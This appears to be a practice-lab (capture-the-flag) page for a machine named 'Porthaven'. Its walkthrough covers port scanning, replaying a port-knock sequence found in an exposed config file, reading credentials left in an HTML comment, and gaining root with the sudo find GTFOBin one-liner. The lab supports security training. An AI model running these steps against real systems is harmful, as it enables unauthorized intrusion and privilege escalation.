RatLabs
πŸ€ 0 pts earned

Porthaven

A forgotten web server hides its admin panel behind a port-knocking sequence left in a public config file. Find the knock, open the gate, grab the cleartext credentials the sysadmin left in the page source, and follow one GTFOBin straight to root.

Machine may be having trouble (checked 5m ago)
Target IP Log in to reveal
User Flag Pending
Root Flag Pending

Premium

Walkthrough, Tips and Tricks

Walkthrough

Objective

Discover a port-knocking sequence from an exposed configuration file, unlock a hidden service, and escalate to root via sudo find.

Phase 1: Recon & Knock Discovery

  1. Scan all TCP ports: nmap -p- TARGET
  2. Enumerate HTTP β€” find a /configs/ directory listing.
  3. Download the exposed config file and extract the three-port knock sequence.
  4. Replay the sequence: knock TARGET PORT1 PORT2 PORT3
  5. Rescan β€” a previously closed SSH port is now open.

Phase 2: Credential Extraction

  1. Browse the newly unlocked HTTP admin path.
  2. View source β€” credentials embedded in an HTML comment.
  3. SSH as the discovered user, capture user flag.

Phase 3: Root Escalation

  1. sudo -l β€” (ALL) NOPASSWD: /usr/bin/find
  2. sudo find . -exec /bin/sh \; -quit β†’ root shell.
  3. Capture root flag.

Tips

  • knock package: apt install knockd
  • Port numbers may be UDP β€” try knock -u TARGET P1 P2 P3
Tips and Tricks

Tips

  • Try both TCP and UDP for the knock sequence.
  • View source on every page β€” HTML comments are the most common quick win.
  • sudo find . -exec /bin/sh \; -quit gives an instant root shell.

Community

Community Walkthroughs

No community walkthroughs yet β€” be the first!

Log in to submit your own walkthrough.